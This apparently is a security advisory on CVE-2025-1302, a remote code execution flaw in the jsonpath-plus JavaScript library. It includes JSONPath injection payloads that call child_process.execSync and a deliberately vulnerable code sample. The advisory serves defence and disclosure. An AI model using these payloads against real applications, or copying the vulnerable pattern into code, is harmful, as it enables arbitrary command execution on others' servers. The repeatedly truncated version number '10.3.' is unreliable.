CVE-2025-1302 - Remote Code Execution in jsonpath-plus Before 10.3.

CVE-2025-1302 is a newly disclosed vulnerability affecting the popular JavaScript library jsonpath-plus. It allows attackers to execute arbitrary code on any system running a vulnerable version of the library. This happens due to unsafe handling of user input in eval='safe' mode, which fails to properly sanitize strings before evaluating them.

> Versions Affected:
> jsonpath-plus versions before 10.3.

Attackers can exploit this issue for Remote Code Execution (RCE). If you use jsonpath-plus in your app—especially with user-supplied input or untrusted data—you are at risk.

Why Did This Happen?

This vulnerability is an incomplete fix for CVE-2024-21534. While the original CVE attempted to patch up unsafe code paths using the eval='safe' option, researchers found that the fix wasn’t enough. Attackers could still sneak malicious code past the filters due to gaps in sanitization logic.

How Does the Attack Work?

The problem is rooted in how jsonpath-plus processes expressions provided in JSONPath queries. When using the eval='safe' mode, it's expected that user-provided values inside expressions would be isolated. However, unsafe defaults and poor validation allow input like:

$.store.book[?(@.price < 10 || (process.mainModule.require('child_process').execSync('touch x')))]

Because the embedded JavaScript is insufficiently filtered, this code would run inside your Node.js process—allowing attackers to run any shell command they want!

Vulnerable Code

const { JSONPath } = require('jsonpath-plus');

const inputQuery = "$..book[?(@.author.match(/John Doe/) || eval('require(\"child_process\").execSync(\"touch /tmp/hacked\")'))]";
const data = {
  "book": [
    { "author": "John Doe", "price": 15 },
    { "author": "Jane Roe", "price": 8 }
  ]
};

// BAD: Directly passing inputQuery from the user!
const result = JSONPath({ path: inputQuery, json: data, eval: 'safe' });

console.log(result);

What Happens

An attacker could submit a malicious JSONPath query that executes any shell command, such as writing to a file or even starting a reverse shell.

How to Fix (Mitigation)

Upgrade Immediately
Upgrade jsonpath-plus to version 10.3. or later, where this vulnerability is fully patched.

npm install jsonpath-plus@^10.3.

NEVER accept untrusted user input directly as a JSONPath expression—if you must, sanitize it *yourself* or use a strict whitelist approach.

> Pro Tip:
> Restrict access to sensitive functions and always run Node.js apps using the least privilege possible.

References & Additional Reading

- Official Advisory from jsonpath-plus
- NPM security advisory
- Snyk Vulnerability Report for CVE-2024-21534
- CVE Record for CVE-2025-1302 *(pending update)*
- jsonpath-plus GitHub

Final Thoughts

If you’re using jsonpath-plus below version 10.3., update right away. Even in “safe” eval mode, your server can be tricked into running arbitrary shell commands. Double-check your dependency tree and audit any other packages that might bring in older versions.

Stay secure—patch fast, review your exposure, and keep up with advisories!


*Written exclusively for you to help keep your JavaScript applications safe.*

Timeline

Published on: 02/15/2025 05:15:11 UTC